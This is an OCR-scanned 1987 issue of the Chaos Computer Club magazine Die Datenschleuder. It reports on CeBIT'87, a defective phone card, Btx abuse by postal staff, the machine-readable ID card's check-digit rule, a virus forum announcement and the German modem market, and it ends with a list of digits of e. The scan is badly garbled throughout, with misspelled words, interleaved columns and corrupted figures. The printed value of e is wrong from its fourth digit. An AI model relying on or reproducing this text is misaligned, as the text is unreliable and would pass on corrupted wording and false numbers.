tur, oh welch Pein ist mir von den Händen genom¬
men. Außerdem will Jack den Pcriphericmarkt mit
einem billigen Laserdrucker, den Videospiel-Markt
mit einem gestärkten Image, den PC-Marktmit einem
Ibm-Kompatiblen, und den US-Mark( mit 75 Mega-
Dollars erobern (”Wir befinden uns ab sofort im
Krieg.”). Commodorc hat seinen Ideen nur im Sinne
mannigfaltiger Gehäuse- und Ausstattungsvarianten
freien Lauf gelassen,
SntcitW/leMhfr
Digital Equipment hat unsere unmißverständlichen
Verlautbarungen endlich erhön und will eine Micro-
VAX mil zugekleblem Q-Bus und einer (zugegebe¬
nermaßen lächerlichen) 40 MB Platte sowie 4 MB
Hauptspeicher für etwa 20 KDM auf den Hacke-
ruraworbenen Markt bringen, die MicroVAX 2000.
Wer von euch auch eine Haben möchte, tue dies
rechtzeitig kund, damit wir vielleicht im Dutzend bil¬
liger kaufen können... Es lohnt sich auf jeden Fall,
schonmal die bisherige Software von unseren Sattcli-
len wieder einzusammein und zu archivieren.
Für die Kommunikatoren werden sich als schwacher
Trost für die Datex- Gebührenerhöhung bald preis¬
werte 2400 baud Vollduplex-Modems etablieren, ein
erstes wechselte bereits auf der Messe für DM 300,-
zugunsten eines Hackers den Besitzer. Auch die Post
plant die Einführung von V.22/V.22 bis Modems zum
bisherigen Preise des D1200S-12, Eine Nutzungsmö¬
glichkeit derselben soll es zunächst für Blödeltcxt,
später auch für Patex-Dgeben,
Erstmals Öffnete sich ein Anbieter von High-End
Graphik- und Animalionsmaschinen dem sterblichen
Besucher. Bei Symbolics erklärte man bereitwillig je¬
dem. was dieses Lisp-Sysiem zu bieten hat: Color Vi¬
deo Digitizer, Echtzeitanimation auf beliebig defi¬
nierbaren Pfaden, prolessionelle Video-Schnittstelle
für MA2, Texture Mapping (Das Aufziehen von
Oberflächenmustem auf einen Körper) und einen
sehr komfortablen Animations-Edilor/Debuggcr.
Bei Evans & Sutherland gab man sich bedeckter.
Das Modethema des Jahres ist Desktop-Publishing,
fertige Lösungen sind allerdings rar. Der Begriff ver¬
sucht das zu beschreiben, was die Redaktion der
DATENSCH LEUDER seit Bestehen zur Produktion
nutzt, nämlich die Textgestaltung auf dem Micro-
computer sowie die Ausgabe auf Laserdrucker oder
Foiosaubelichicr.
Witzige Zugangssicherungen haben sich einige An-
bietervon Sicherheitssystemen ausgedacht: Berechti¬
gungsnachweis durch Fingerabdruck. Zusätzlich
kann auf Kundenwunsch die Fingertemperatur, der
Puls des Probanden, und die Finger- l^itfähigkeit
gemessen werden. Das System funktioniert auch
noch mit einer leichten Verletzung des Fingers, da
nur etwa fünfzig von hundert Bildpunkten überein¬
stimmen müssen. Es können darüberhinaus beliebig
viele Reservefinger definiert werden. Ob dieses Sy¬
stem auch ein Frischgekochtes Abbild aus verdicktem
Himbecr/Vanille- Pudding akzeptiert, konnte bisher
nicht geklärt werden, da dem betreffenden Redakteur
der Pudding mißlang.
Wie bei jeder CeBIT fand auch diesmal das Traditio¬
nelle Hackertreffen am Dienstag auf dem größten
Poststand statt. Es kamen über hundert Hacker, von
denen ich wegen Verspätung nur noch etwa zwanzig
zu Gesicht bekani, um Informationen, Ideen und
Größe auszutauschen. Von Bayern bis Schleswig-
Holstein waren die Hacker nach Hangover gepilgert.
Es wurden Gespräche begonnen, die des Abends in.
einer wohlgestalteten Kneipe vertieft oder verflacht*
wurden.
Das Treffen hat gezeigt, daß viele Hacker zusammen
mit ihren Maschinen älter und professioneller ge¬
worden sind, d.h. in die Industrie Eingeireten sind,
und der Nachwuchs dünner gesät ist, als zu Beginn
der hiesigen Hackerkultur. Die Computerwelt hat ein
wenig von Mythos und Faszination aus der Pionier¬
zeit eingebüOt. Das Chaos hat Punkte an die Sachz¬
wänge abgegeben.
Vic
CEßlTVt9.DOC J9870327 1415
DS Seite 11
Kriegserklärung von ATARI
Eindrücke von der CeBIT’87
Maschinenlesbares Geld?
Auf der CeBit’87 gab es viel Neues zu sehen. Sogar
die Deutsche Bundespest versuchte sich mit neuen
Technologien. Sie stellte ihr Kartentelefon vor. Es
gab eine Demokarte mit fünf Einheiten im Wert von
1,50 MDM (Maschinenlesbare Deutsche Merker).
Nachdem ich mich gegenüber dem Postler als
CCC'ler vorgestellt hatte und er den Schock verdaut
hatte, kam er damit, daß die Karten mit Chips
(Eproms!) arbeiten und diese ABSOLUT sicher seien.
Wieder in Hamburg dachte ich mir, man könnte die
Karte ja mal ausprobieren. Ein Kartentelefon war
schnell gefunden (ca. 15 Min). Das Telefon nahm
meine Karte sogar an. Voller Stolz mit so moderner
Technik umgehen zu können, rief ich einen örtlichen
Freund an. Nach ca. 1 Chaoseinheit (8 Min.) ver¬
nahm ich einen Pfeifton und die Meldung: "Karte
wechseln”. Als anständiger Bürger meinte ich zum
Telefon, daß ich noch 4 Einheiten hätte. Ergebnis:
Die Verbindung wurde unterbrochen und das Tele¬
fon behauptete: "Restguthaben 0,00 DM”. Entweder
hat die DBF die Gebühren heimlich erhöht oder das
Gerät war von XXXX (Name zensiert). Man stelle
sich einen normalsterblichen Menschen vor. der sich
200 Einheiten für 50 DM kauft und sowas erlebt. Der
Preisverfall im GIPS-Bereich
Zwar bringt Tramiel die Rechenleisiung einerCRAY
noch lange nicht im Handheld-Format unter, aber
eine xx-GIPS-Maschine von SYMBOLICS paßt loc¬
ker unter den Schreibtisch. Für deutlich weniger als
eine halbe Million Dollar lassen sich mit diesem Ge¬
rät Bilddaten verarbeiten.
Bilddaten und Mustererkennung
Das Auge hat im Verhältnis zur Fläche den wohl
größten Datendurchsatz. Die nachfolgende Verarbei¬
tung ist weitgehend ungeklärt. Immerhin bietet CA¬
NON für den Preis eines besseren Foxtrottcls einen
dort anschiießbaren Bildleser, der eine A4-Seiie mit
etwa 12 Linien pro Millimeter einliest und mit glei¬
cher Auflösung auf einem Laserdrucker ausgibt.
Außerdem wurde Zeichenerkennung üblicher
Schreibmaschinenschriften gezeigt. Derzeit ist noch
unklar, ob diese Zusatzsoftware weniger oder erheb¬
lich mehr oder wieviel im Verhältnis zur Hardware
kostet. Immerhin gibt es Programme, die mehr als das
SOfache der zugehörigen Hardware kosten.
Insgesamt ist die maschinelle Erzeugung des beweg¬
ten Gesichtsbildcs noch nicht rentabel und ein engli¬
scher, mit Sat An empfangbarer Fernsehsender mietet
einen lebendigen Fernsehsprecher und erweckt durch
maschinelle Vereckung und massig Schminke den
Eindruck einer Roboterproduktion (”Max Hea-
droom”). Das ist billiger als derzeit nicht verfügbare
Computerkapazität.
SatAn steht mit großen Buchstaben auf dem Dach
des ZDF und ist ein eingetragenes Warenzeichen der
Antennenfirma Kathrein. Mittelalterliche Fürsten
sperrten einen klapp Yogafähigen guten Schachspie¬
ler in einen kleinen Holzkasten mit innengesieuerter
mechanischer Figurenbewegemechanik, um hohe
Gäste zu beeindrucken. Im übrigen ist Künstliche In¬
telligenz ein Schlagwort, das von vielen benutzt wird,
die nicht einmal die niedrigste Stufe davon, nämlich
die Computerviren, begriffen haben. wau
cebitwl9.doc 12.03.
wird ja schwarz vor Schilling.
Abschließend wäre noch zu sagen, daß mir zu Ohren
gekommen ist, daß die DßP 50.000 NMDM (nicht
maschinenies. DM) für einen absolut sicheren Chip
bielet. Die Pest möge dies bitte bestätigen oder de*
mentieren, denn NMDM ist auch Geld. Wenigstens
dürfte das Kanentelefon eine glorreich kurze Zu¬
kunft haben.
terra
87032514262 mshgldiy.doc
I
©er
Uirus
war
da
Der auf dem CCC86 vorgcstellte
und zwischenzeitlich verbreitete
MS-DOS Demovirus V1RDEM.COM, der
ursprünglich nur auf Laufwerk A:
seine Qualitäten unter Beweis stell¬
te, ist jetzt in einer 'Sicherheits¬
kopierten' manipulierten Version
aufgetaucht. Bei der jetzt sicherge¬
stellten 'Sicherheitskopie" war die
Laufwerksbezeichnung auf C: geändert.
Die Redaktion weist aus diesem Grund
daraufhin, daß zu Testzwecken ver¬
siegelte DemoViren von der Redaktion
bezogen werden können. Bei Kopien
von 'Freunden" besteht die Gefahr
einer bösartigen Verbreitung.
Weiterhin sind beim CCC neue Viren
eingegangen. über Hailboxsysteme
verbreitet sich derzeit der Programni—
quellcode eines überschreibenden
Virus in TURBO-PASCAL, Dieser ist
zwar “primitiv" geschrieben, eignet
sich aber durch die gute Kommentie¬
rung zur Entwicklung weitaus bösarti¬
ger PC-Viren. Mehr über Viren im
nächstem Heft, oder fUr die, die
nicht warten können auf unserem
österlichen VirenPorum.
LS23 - VIREN.Txt
S>atenStf)Uttiep
DS Seite 12
art Her?
DolcuBienta 1986; Klaus Geldmacher baut
"ohne Tibel* aus StahJLvinkelprofileii, Ven¬
tilatoren, Leuchtröhren, Tonträgern und
Verstärkern. Kinetik %far eines der Zauber¬
worte. Lichtobjekte ein anderes,
art-ware 1987: Klaus Geldmacher baut "ohne
Titel* aus Leuchtröhren, Ailgebrauchs-
lampen, Tonträgern und Verstärkern, und -
ganz neu - etwas Farbe und allerlei Unrat,
Kunst und Blektronik heißt jetzt das Zau¬
berwort?
Bochumer Kunstwoche 1973; TV-cello und TV-
Bett mit Charlotte Moorman und Nam June
Vaik (die ersten Arbeiten Paiks' mit Moor-
man und TV-Ceilo stammen aus den 60em) .
Elektronik-Freaks der späten 80er, ihr
würdet ausflippen über die alten Arbeiten
von Paik/Moonoan - wenn ihr sie nicht
schon kennt 11
Aber ein schlichtes Video-Bett mit ange-
steil-tem Kopfteil und Ftiflende auf der
art-ware 1987? Elektronische Kunst?? Wir
können natürlich süffisant mit den Achseln
zucken: “Thematische“ Ausstellungen kennen
wir aus den letzten 10 Jahren zur Genüge:
Hir haben zu allen erdenklichen und gegen¬
sätzlichen Themen immer wieder die selben
Arbeiten gesehen, was regen wir uns auf.
“Kunst tmd Elektronik* also das flockig
unverfängliche Thema fUr das ausgehende
achte Jahrzehnt? Und überhaupt nehmen wir
die Kunst schon lange nicht mehr ernst.
Und hier fallen mir doch sofort ein paar
ernste Dinge ein. werden Künstler und
Ausstellungsmacher denn nicht gewahr, daß
was sie machen gar nicht mehr wirklich
ist? Gerade hier • nämlich auf einer
Industrie-Messe - wo Wirklichkeit sich vor
uns aufCächert: faszinierend, phanta¬
stisch , beängstigend, unvorstellbar,
brauchbar, codiert, transparent, unbe¬
greiflich, käuflich ... hier ist art-ware
einfach unwirklich. Weil doch gerade hier
die Chance geboten ist, über weltweite
Vernetzung (hier sind ja Telefone keine
Attrappen), elektronische Infrastruktur
und die Aligegenwart des elektronischen
Mediums - Kunst und Elektronik? - in die
wirkliche Wirklichkeit einzugreifenI Statt
dessen ein bißchen technisierter Bluff für
einen braven Bürger, der vor der Technik
mehr Furcht hat als Ahnung von ihr, ein
bißchen aufgexnotzte Ästhetik aus den
60em, mehr nicht. Und das mit den techni¬
schen Möglichkeiten für morgen?
Ich frage mich immer wieder, und hier
besonders: wo leben Künstler (und Ausstel-
lun gsm acher) ei gentlich, was- ist ihre
Wirklichkeit? Die Ästhetik vergangener
Jahrzehnte? Dann können wir unsere Auf¬
merksamkeit getrost abwendan von der soge¬
nannten Kunst, ohne Schaden zu nehmen.
Oder soll hier demonstriert werden, anhand
von schlechten - es ist ein Ja mme r! - und
verfälschten Beispielen, wie weit schon
vor ca. zwei Jahrzehnten ein paar Künstler
beispiellos zu denken bereit waren? Das
wäre kein schlechter Einfall, könnte man
doch so vielleicht den Widerwillen gegen
alles was Kunst heißt nicht nur der jungen
elektronikverliebten Zeitgenossen ein
wenig aufweichen.
Die Frage ist ja gar nicht, ob sich hier
kleinkrämerhafte Vorstellungen der Aus-
steilungainacher oder Phantasielosigkeit
realitätafremder Künstler als Ware ver-
wirklichenj die Frage ist vielmehr, wo
sind die "wahren Künstler", die sich die
Möglichkeiten der Komunikation mittels
elektronischer Medien längst zu eigen
gemacht haben, die in den immateriellen
Räumen der weltweiten und der lokalen
Netze längst eine neue •Öffentlichkeit“
gefunden haben. Auf der art-ware 1987 sind
sie nicht, auf der CeBit‘87 Ist der eine
oder andere zu finden. Ihre Arbeit ist
wenig spektakulär: Kommunikation ist nicht
stofflich und gar nicht monumental, art-
ware-Macher scheinen sie gar nicht wahr zu
nehmen.
Vielmehr scheinen sie mit dem Hinweis auf
die "wichtigen Erkentnisse für unser post-
TECHNOLOGISCHES (WAS IST DAS?) Zeitalter"
einen rückwärts gewandten Salto Mortale
zuviel gemacht zu haben: post-technolo¬
gisch heißt soviel wie VOM TECHNOLOGIE
KEINE SPUR, und wir befinden uns wieder -
oh Wunder - in der akademischen Ästhetik
der ausgehenden Romantik. Von hier aus
können wir nun endlich begreifen, warum
‘Femsehschirmo, Personalcomputer, Video
UBW. ernst zu nehmende Ausdrucks- und
Gestaltungsmittel" (so ernst wie Pinsel
und Heisseil) “einer ganz neuen inter¬
nationalen Kunst-Richtung" sind. Und wenn
wir dann schon mal unserer Zeit weit
voraus sind, dürfen wir auch noch einen
Blick in ferne ZuJoinft wagen; Wenn Gerry
Schümm einmal in den 60em des 20sten
Jahrhunderts seine “erste" Video-Galerie
eröffnen wird, so wird es nur Schnee von
gestern sein, und ebenso wenig wird es uns
dann beeindrucken, wenn ein gewisser
Ducheimp im ersten viertel des selben Jh.s
nicht mehr mit Pinsel und Meiasel aber auf
Glas arbeiten, dann nur noch Schach spie¬
len wird, und - achl, Infra-mince und Yves
Klein beim Verkauf von immateriellen,
malerischen Sensibilitätszonen I - und
erinnern uns wieder an Nam June. Paik...
Verlassen wir .die Gegenden, in denen
Künstler versuchen, eine Art Ware aus
einem heißen Brei zu bereiten, den sie in
Wirklichkeit aber nur umschleichen xind be¬
schwörend immer wieder IST-ZEIT nennen.
Und, wie schade, jetzt ist schon Zeit
aufzuhören, weil die Seite zu Ende ist.
mrina kem
DS Sette 13
BildschLrmtext, Hacker
und kriminelle Postler
Zwei Hachträga in Jahresbericht des
Berliner oarenschutzbeauftragtan
erscheinen der Redaktion berich-
tenswert.
*Su den von Hamburger Datenschutz-
beaufcragcen federführend durchge¬
führten Untersuchungen zum spekta¬
kulären Fall des Hamburger “Hacker-
Clubs*, der unter der Identität
eines Kreditinstitutes für
135.000,- DM gebührenpflichtige
Seiten abgerufen hatte, berichtete
Ich (der Berliner OSB, die Red.} ln
Vorjahr über den damals als sicher
geltenden Srkenntnisstand, daß
unbedachter Umgang mit dem geheimen
Kennwort ursächlich sei und nicht
ein Fehler des Btx-Systems.
Da zwischen dem Redaktionsschluß-
cemin des Berliner und des Hambur-
gischen Oatenschutzberauftragten
zum Jahresbericht 1985 der Bundes-
beauftragte für den Datenschutz
aufgrund eines Amtshilfeersuchens
des Hanburgischen Datenschutz¬
beauftragten bei der Prüfung des
Btx-Systems zu dem Ergebnis gekom-
nen war, daß ein technischer Mangel
des Btx-Systems als Ursache nun
doch nicht auszuschließen war,
ergab sich somit ein Unterschied
zwischen der Daztsellung des Ham-
burgischen Datenschutzbeauftragten
und meinen Ausführungen, der von
der Bilschimtext-Fachpresse als
Meinungsunterschied interpretiert
wurde. Selbstverständlich ist die
Darstellung des Hamburgischen
Datenschutzbeauftragten letzter
Stand der Angelegenheit.“
Der CCC wird den vollständigen
Uncersuchungsberleht des Kanbur-
gischen Datenschutzbeauftragten in
der MackerbLbel Teil II zun ende
dieses Jahres abdrucken. Ende.
Eine zweite “Hackemeldung* findet
sich in Bericht des Berliner
Oatenschützers nur eine Leerzeile
tiefer.
"In _dein_ini letz ten . Jahresbericht
erwähnten Fall eines Berliner Teil¬
nehmers, unter dessen Teilnehocr-
kennung ein Dritter gebührenpflich¬
tige Seiten aufgerufen hatte, weil
er sich dem System gegenüber als
freizügig (sowas wie ein blinder
Portier, d.Red.) deklariert hatte
und unbedachter Umgang mit dem
Kennwort nicht auszuschllessen war,
haben die staatsanwaltschaftlichen
Ermittlungen anhand der Überprüfung
der Protokolle über die Systenuiut-
zung ergeben, daß der unbefugte
Zugriff unter falscher Kennung über
ein Terminal erfolgte, welches in
Bereich einer Femsprachentstö-
rungsstelle der Deutschen Bundes¬
post in Berlin aufgestellt war. Dia
Identität des Täters selbst konnte
jedoch bisher nicht ermittelt wer¬
den . ■
Dieses ist nicht der einzige uns
bekannte Fall, bei dem Postlern
(und nur solche haben zu bestimmten
Räumen und Informationen Zutritt)
ein grob fahrlässiger, Ja sogar
teilweise krimineller weise, Umgang
mit vertraulichen Informationen
Getaoe im suge aer tincuncung von
ISDN, welches.noch weit mehr Mani-
pulations und Protokollmöglichkei¬
ten bietet, gewinnt diese Frage
eine existenzielle Qualität.
Der waschnaschinenfeste
Personalausweis
Kaiua jemandem dürfte entgangen
sein, daß seit dem 1. April von den
pexsonalausweisbehörden der neue
maschinenlesbare Personalausweis
ausgegeben wird. Diejenigen, die im
März einen Waschtag einlegten und
auf den letzten Drücker noch einen
der Papplappen ergatterten haben
(sollte der Ausweis einem Ordnungs¬
hüter nicht in den Dreck fallen)
bis 1992 Ruhe. Der Rest darf sich
freuen.
Beim neuen Ausweis entfällt zu¬
nächst das Ausfüllen eines Antrags
durch den Bittsteller, dieses wird
von der Personalausweisbehörde (oft
die Meldeämter) übemomnen. Zu¬
nächst wird im Antrag gekennzeich¬
net ob der Bürger "schreibkundig“
oder “sehreibunkundig" ist. Dieses
muß man ja wissen, da “schreib¬
unkundige* ja den Ausweis nicht
unterschreiben können.
Folgend wird das Passbild (gemessen
vom Haaransatz bis zur Kinnspitze
in einer Höhe von 20 bis 25inni)
möglichst schwarz/weiß mit einem
helleren Hintergrund in Fortmac 35
X 43 Ron entgegengenommen.
Der Antrag wird daraufhin mit einer
Schreibmaschine (Schrift OCR- Bl,
Tipp-Ex erlaubt) ausgefüllt. Oabel
müssen folgende Felder ausgefUIlt
werden: SecXennummer, Antragsdatun,
Familienname, vomane(n), Geburts¬
tag, Geburtsort, Wohnort (Haupt-
wahnaitz), Größe und Augenfarbe.
Weiterhin sollen folgende “Kann-
Felder* ausgefüllt werden, wenn
.entsprechende persönliche Daten
vorliegend Geburtsnane, Poatamscbe-
reich, Wohnung, Hausnummer, Ordens-
nams/Künstlemajne. Fehlen diese
Daten bleiben die Felder leer. Bei
diesem ganzen AusfUllen werden die
Ausnahmefälle in der Schreibweise
(Akzente und Sonderzeichen] geson¬
dert behandelt und verarbeitet.
Oie “Serlennummer“ hat eine Länge
von 10 Ziffern. Vier Ziffern sin d
für die Behdrdenkennzahl, weitere
fünf die laufende Hummer und eine
Ziffer als Prüfziffer. Die Prüfzif¬
fer wird wie folgt berechnet: Mul¬
tiplizieren jeder Ziffer der Behör¬
denkennzahl und der laufenden Num¬
mer, beginnend mit der ersten Zif¬
fer, mit den Faktoren 731731731 auf
der Basis von Modul 10 (1. Ziffer
mal 7, zweite mal 3, usw). Dann
Addieren der neun Blnzelprodukte.
Dividieren der Summe durch 10.
Verbleibt bei der Division ein
Rest, so ist dieser die Prüfziffer;
verbelibt kein Rest, so lautet die
Prüfziffer 0.
Dann werden die Anträge, bis zu 10
Stück, in einer Kunstoffhülle ver¬
sandt. Der fertige Ausweis kann
dann wenige Tage später unter¬
schrieben und abgeholt werden.
Frankreich hat sich im Gegensatz
zur Bundesrepubllck, gegen die Ein¬
führung eines maschinenlesbaren
Ausweises entschieden. oemokra-
Ostem '87 in Hamburg
II. VirenForum und
Mitgliederversammlung
Zu Ostern, genauer am 13. und
19. April treffen sich in Kaaburg
Hacker, Freaks und Datenreisende zu
einem Arbeitstreffen. Neben einem
Workshop über ConputerViren, der
nichterörterta Bereiche des viren-
Forums vom CCC'Bß vertiefen soll,
trifft man sich zun Infomatlonsaus-
tausch sowie zur 1. Mitgliederver-
aamfnlimg des CCCeV. Veranstaltungsort
ist wieder das Bldelstedter Bürger¬
haus jClbgaustcafle 12, Hamburg 54),
jedoch nicht in der räumlichen Größe
der CC-Congresse. Angemietet wurden,
ab Samstag morgen bis Sonntag abend,
nur die Aula sowie das Cafe und ein
weiterer Konferenzraum - auf Technik
wird weitgehexKi verzichtet.
Die Teilnahmemöglichkeiten sind somit
auf ca 100 Personen begrenzt.
Geplant ist:
Freitag 17, April - Anreisetag für
Interessierte - Obemachtungsmög-
lichkeiten möglichst privat besorgen -
Zeit für private Gespräche.
Samstag 18. April - ab 10 Uhr Ein¬
treffen der Hamburger Crew zwecks
Einrichtung der Räume - somit ab
12 Uhr Eintreffen der Teilnehmer des
Vizenforxms - ab 14 Uhr Vorgespräche
und fescLegen des Abiaufplanes (der
genaue Ablauf richtet sich nach den
Interessen der Teilnehmenden Per¬
sonen) - dann Workshops bis ca
18 Uhr.
Samstag 18‘. April - ab 20 Uhr Mit¬
gliederversammlung des CCCeV ln
der Aula, der übliche Veceinskra»
sowie Diskussionen über die Zukunft
des Vereines, bis in die Nacht.
Sonntag 19. April - ab 12 Uhr
Weiter-führung der Workshops des
VtrenForuma bis circa 16 Uhr -
anschliessend Aufräumen und Übergabe
der Räumlichkeiten - folgend Zeit
für private Gespräche.
Mitglieder des CCCeV, die ihre Bei¬
träge bezahlt haben, bra uchen sich
nicht anzumeiden und zahlen auch
keine TeilnahmegebUhr - von allen
anderen wird erwartet, daß sie
DM 10,- auf unser Postgirokonto
(599090-201, Postgiros Hamburg,
BLZ 20010020] unter dem Stichwort
“FORUM* zur Anmeldung bis zun
15. April einzahlen und den Beleg
mitbringen. Gebt bitte Eure Telefon-
nuaer an, damit eventuell vorberei¬
tend Gespräche geführt werden können.
Der CCC hofft auf eine ruhige, nicht
zu chaotische Veranstaltung,
übemachtungsplätze sollten privat
besorgt werden, sonst kann auf die
Jugendherberge (Stintfang) zurückge-'
griffen werden. Verpflegung ist nicht
geplant (Ausnahme Kaffee). Bringt
gute Laune mit, und sollten noch
Fragen unbeantwortet sein, ruft
Steffen unter 040-483752 oder die
CCC Geschäftsstelle unter
040-4903757 an.
(Zugangsberechtigungen, Manipula- tische Systeme benötigen einen
tionsmöglichkeiten) nachzuweisen Freiraum, der Hiedertstand gegen
ist. Dia Redaktion erbittet Hin- faschistische Tendenzen noch ermög-
weise von den Lesern um in dieser licht. Aber wir Deutschen waren ja
Sache weitere Recherchen anzustel- schon immer etwas gründlicher. Die
len. Es stellt sich die Frage, ob Folgen dieser effektiven Kontroll-
die Bundespost überhaupt ein möglichkeit werden wir in wenigen
Bewußtsein um den Datenschutz hat? Monaten zu spüren bekommen.
Kommentar:
Strategien der Deutschen Bundespost
Die DBP erweckt den Eindruck, ihre Monopolstel¬
lung wäre aufgehoben. Die Deutsche Bundespost
entwickelte geschickt eine Intrige auf dem Schlacht¬
feld des deutschen Modemmarktes. Bis Ende 1986
durfte man nur Modems der DBP am öffentlichen
Fernsprechnetz betreiben, jedoch im Bereich der in¬
ternationalen Mietleitungen gewährte sie den Betrieb
von leilnchmereigenen Modems, soweit diese über
eine allgemeine F^Z-ZuIassung (jetzt 21ZF-Zul.) ver¬
fugten. Die deutschen Modemanwender ertrugen
diese Last mit trauerndem Blick auf die Marktlibera-
Itsiening der europäischen Nachbarstaaten und in
den USA. Der EG fiel schon früh diese Marktverzer-
ning der DBP, zugunsten ihres Monopols ins Auge,
und sie berief eine Brüssler EG-K.ommision ein, um
sich näher mit diesem Phänomen zu befassen.
Unter dem ständigem Druck der EG-K.ommission
und bedroht von einem Gerichtsverfahren konterte
die DBP mit einem Kompromißvorschlag, der eine
Liberatlsienjng des Modemmarktes in Aussicht stell¬
te. Der Postverwaltungsrat lehnte allerdings diesen
Vorschlag am 30. Juni 1986 mit der Begründung ab,
es sei nicht eindeutig geklärt, in welcher Weise die
EG Einfluß auf die Posipolilik nehmen dürfte. Dies
ist verständlich: der Postverwaltungsrat setzt sich aus
Vertretern der Industrie zusammen, die wie z.B. Sie¬
mens als Hoflieferant der DBP um ihr Modem-Mo¬
nopol fürchten. Das Bundeskabinett überstimmte je¬
doch am 16. Juli 1986 den Postverwaltungsrat und
ebnete somit den Weg für die 30.,Änderungsverord-
nung zur Femmeldcordnung (30.ÄndVFO). Diese ist
nun seit dem I . Dezember 1986 rechtskräftig.
Nach der 30. ÄndVFO ermöglicht die DBP den Ein¬
satz von privaten und vor allen Dingen teilnehmerei-
genen Modem’s. die, un d hieri n liegt der Haken, wei¬
terhin an die allgemeine FTZ-Zulassung(-ZZn ge¬
bunden sind.
Ais wahre Täuschungen entpuppen sich djese klug
formulierten Fachspeziflkationen der 30. ÄndVFO:
Es existieren vorerst (bis Ende 1987?) noch gar keine!
So dürfen baugleiche Modems von Herstellern, die
für die Post produzieren, nicht am Öffentlichen Fern¬
sprechnetz eingesetzt werden, da die Zulassung man¬
gels Vorschriften nicht erfolgen kann.
Der Markt staunt hingegen, mit welcher Kühnheit die
DBP noch rechtzeitig zur CeBit '87 die Zulassungs¬
bedingungen für eine der Steinzeit in der Datenkom¬
munikation entsprechende Übertragungsnorm, der
V26bis ankündigt. Unter die V26bis Norm fallen alle
Modems, die der Gcschwindigkeitsklasse von 2400
und 1200 Baud mit Hilskanal angehören. Diese
Norm Ist mittlerweile Vergangenheit. Die DBP argu¬
mentiert zwar immernoch mit dem Einsatz der V26bis
bei BTX als Standard, jedoch überzeugt ein kurzer
Blick in die USA vom Gegenteil. Dort wird bereits
seit rund zwei Jahren mit 2400 Baud vollduplex über
das konventionelle 2-Draht Fernsprechnetz gehackt.
Der Markt wirkt völlig irritiert und fragt sich, ob
schon wieder die Absicht der DBP besteht, eine neue
Technologie zu verschlafen bzw. welche Gründe hin¬
ter dem Modem-Spcktakel stehen.
Ganz behutsam wirbt die DBP bereits für ihre neuen
2400 Baud 2- Draht Vollduplex Modems von Kabel-
metal und Siemens, deren Absatz gesichert werden
muß. Hier liegt einer der Hasen im Weffer: Das Post-
Modem D2400S nach CCITT V22bis einschließlich
automatischer Wahlcinrichtung nach CCITT V25bis
kostet 5800.- DM! Wem wuchert es nicht, denn auch
eine monatliche Miete wird mit 120.- DM recht teuer.
Folglich versucht die DBP mit allen Trix die Priva¬
tanbieter zu schocken. Zum einen verzögert sie das
Erscheinen der Zulassungsbedingungen, um den ei¬
genen Absatz zu sichern mit der Begründung, erst
eine EG-weite Einigung erreichen zu wollen. Zum
anderen wird dem Anwender eine Schikane aufge-
drückt in Form einer monatlichen Prüf- und Meßge¬
bühr von bis zu 25.- DM bei Einsatz von privaten
Modems. Als besondere Krönung bedankt sich die
DBP noch zu guter letzt mit dem gefürchteten Ge-
bührcnhoiToram PATTEX-D Zugang.
Vorerst wird es also nichts aus dem durch die 30.
ÄndVFO garantierten freien Modemmarkt. S. Stahl
Mohr als 20 Soc.
3uf Höchststufe
... 15...
BGB: Das meistgeklaute Buch
(dsndr) Wie eine Untersuchung öffentlicher Bibliot¬
heken ergab, steht juristische Literatur und dabei das
Bürgerliche Gesetzbuch an der Spitze entwendeter
Bücher. wau
IMPRESSUM
DIE DATENSCHLEUDER Nr.19, 31.4.87
Das wissenschaftliche Fachblatt
für Datenreisende.
Schwenckestraße 85
D-2000 Hamburg 20.
GeoNet: Geol: Chaos-Team
BTX-Leitseite: *655321 * #
Herausgeber und V.S.0.P.:
Herward Holland-Moritz.
Mitarbeiter (u.a.): marina kern,
R.Schrutzki, S.Wernery, A.Eichler,
P.Franck, M.Kuehn, Andy M.-M., KS,
Jwi, DDT, Carsten, Poetronic, TL.
Vierfarb-Kartoffelhochdruck im
Selbs tverlach.
Die Datenschleuder
DS Seite 15
't::zri.abt»B^Uc>« C9927F Gab.baz.
Wenn unzustellbar
Anschriftenausschnitt bitte
mit neuer Adresse zurück
In
eigener
Sache!
1) Schickt uns keine EINSCHREIBEN,
die können nämlich bis auf weite¬
res nicht angenommen werden (Hab
keinen Perso in dem ich Chaos
Computer Club heiße).
2) Das in der DS18 angebotene
Paket zur Volkszählung ist nun
wiederwärtigerweise doch nicht
lieferbar, da uns die Vertriebs¬
rechte von der Autorin nicht
erteilt worden sind. Eingegangenen
Bestellungen werden irgendwie
erstattet.
3) Zur Zeit sind auch die Aufkle¬
ber ''Kabelsalat'' und "Achtung
Abhörgefahr" nicht lieferbar. Vor¬
liegende Bestellungen werden auf
Halde gelegt oder in Briefmarken
erstattet.
4) 'Bitte schickt uns keine Brief¬
marken in 5Pf Werten mehr. Am
häufigsten brauchen wir 80Pf, aber
auch 50, 20 und selten lOPf werden
benötigt.
5) Kurze Briefe die sich mit ein
paar Sätzen beantworten lassen
(oder mit einer ProbeDS) werden
schnellstens Bearbeitet. Längere
Anfragen bitte am einfachsten
telefonisch über den Club
(040/4903757) oder in ganz drin-
goiiden Fällen bei mir Privat (Mo-
Pr 10-23 Sa-So 12-23 unter
040/3193604). Das sind KEIME ilail-
boxen und wer sich nicht an die
angegebenen Zeiten hält der wird
ohne Antwort auf seine Fragen
bleiben. DAS IST BIERERNST!!!!!
6) Wenn ihr was von uns schrift¬
lich wollt, dann legt doch am
besten (für uns) eine ausreichend
frankierten und korrekt adressier¬
ten A5-Umschlag bei. Was ihr für
unsere Portokasse haltet ist näm¬
lich mein privates Portmonaie, und
das ist leer!
7) Und noch was, schreibt bitte
wenigstens eure Adresse leserlich
(ich bin KEIN Cryptologe) und
unsere Antworten kommen dann auch
bei euch an.
8) Frankiert bitte ausreichend,
ich mag kein Nachporto, ihr doch
auch nicht, oder?
So das v;ars, was mir auf der Seele
brannte.
MFG MMU
DS Seite 16
Die Zahl Endlich. Die Genauigkeitsfanatiker haben lan¬
ge auf diese Sensation gewartet. Natürlich ver¬
öffentlichen wir e, die natürlichste aller natürli¬
chen Zahlen, auf 10.000 (in Worten; zehntau¬
send) Stellen hinter dem Komma, und zwar als
Fortsetzungsgeschichte.
Hier nun die erste Folge der Zahl e, die nach
337.61 Sekunden aus einem ATARI 520 aus-
geworien wurde:
2.71928 182B4 59045 2353f> 02074
71352
74272
28364
89613
42251
64450
79182
66249
77572
47093 69995
95749
66967
44235
29486
36372
14174
02398
9344 1
62772
40766
30353 54759
457 13
82178
24796
35743
